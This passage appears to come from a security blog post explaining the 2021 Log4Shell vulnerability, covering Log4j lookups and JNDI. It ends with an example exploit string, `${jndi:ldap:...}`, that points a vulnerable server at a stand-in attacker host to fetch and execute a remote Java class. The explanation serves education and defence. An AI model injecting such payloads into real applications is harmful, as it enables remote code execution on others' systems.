who1s/bd-sorsat/content/posts/2021_log4shell.md

 2. The Log4j happens to have lookup feature (yes, it's a feature introduced in version log4j-2.0-beta9), which allows requesting variables from the system running the Log4j component.
 This feature can be called from Log4j using `${variable_here}` You can request for example username on a Linux system by providing string `${env:USER}` to Log4j and it will log the username from environment variable user and the value is the running the application.

 3. Now we get to the interesting part... :D Java runtime has a [Java Naming and Directory Interface (JNDI)](https://en.wikipedia.org/wiki/Java_Naming_and_Directory_Interface) which can be used to discover and look up data from remote endpoints.
 This feature can be called from Log4j by using the lookup method and adding `jndi` string to the lookup command: `${jndi:method:remoteaddress}`.
 JNDI allows multiple methods for the look up: LDAP, DNS, NIS, NDS, RMI, and CORBA, which means we can use any of these methods to look up more data from a remote endpoint.
+Oh, and the best thing is that JNDI is not a new attack vector, it was [introduced in BHUSA 2016](https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf).

 If we would host our malicious Java class in `example.dfir.fi:4444/legit`, our exploitation string would be `${jndi:ldap:example.dfir.fi:4444/legit}`.
 Inputting this string to vulnerable application would cause the server to look up and execute our Java class hosted on our server.